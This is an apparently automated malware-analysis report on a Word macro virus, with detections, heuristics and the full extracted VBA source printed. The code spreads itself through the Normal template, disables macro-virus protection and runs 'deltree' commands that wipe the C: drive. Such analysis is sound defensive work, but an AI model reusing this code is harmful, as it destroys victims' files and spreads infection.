Verdict: MALICIOUS
Risk Score: 308

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1105 Ingress Tool Transfer
- T1490 Inhibit System Recovery
The sample contains VBA macros that execute upon opening or closing. The AutoClose macro attempts to copy itself and associated forms to the Normal template for persistence. It also executes commands to delete local files, specifically 'deltree /y c:\windows' and 'deltree /y c:\*.*', indicating an attempt to inhibit system recovery. The presence of legacy WordBasic macro virus markers and ClamAV detections further support its malicious nature.
Heuristics (6)

- ClamAV: Doc.Trojan.Mbug-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Mbug-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell "deltree /y c:\windows", vbHide`
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Options.VirusProtection = False`
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4211 bytes |

SHA-256: 7ff9b02a9f8c09715439144bad22d50aa30b6e43664857cea50080af468218f4

Detection:
- ClamAV: Win.Trojan.DelTree-10
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "who"
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
If Day(Now()) = "1" Or Day(Now()) = "13" Or Day(Now()) = "18" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbHide
Shell "deltree /y c:\*.*", vbHide
End If
End Sub
Sub AutoClose()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorAC
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0) = "who" Then
whoInstalled = -1
End If
Next i
If Not whoInstalled Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="who", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UserForm2", Object:=wdOrganizerObjectProjectItems
End If
ErrorAC:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFSA
Dialogs(wdDialogFileSaveAs).Show
If (ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate) Then
ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
End If
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="who", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm1", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UserForm2", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
If Day(Now()) = "5" Or Day(Now()) = "10" Or Day(Now()) = "29" Then
UserForm1.Show
Shell "deltree /y c:\windows", vbMinimizedFocus
Shell "deltree /y c:\*.*", vbMinimizedFocus
End If
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorFT
MsgBox "", vbInformation
ErrorFT:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorTM
MsgBox "", vbInformation
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
On Error GoTo ErrorVVBC
MsgBox "", vbInformation
ErrorVVBC:
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CCBF567D-F339-11CE-9208-8AE360A51863}{CCBF5673-F339-11CE-9208-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
MsgBox "??? Nothing, Go to see who am I", vbOKOnly, "Microsoft who"
End Sub
Private Sub CommandButton2_Click()
MsgBox "??? Nothing, Go to see who am I", vbOKOnly, "Microsoft who"
End Sub
Private Sub Image1_Click()
UserForm2.Show
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{CCBF5681-F339-11CE-9208-8AE360A51863}{CCBF5677-F339-11CE-9208-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Shell "deltree /y c:\windows", vbHide
Shell "deltree /y c:\*.*", vbHide
MsgBox "Huh! Don't have", vbInformation, "Microsoft who"
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```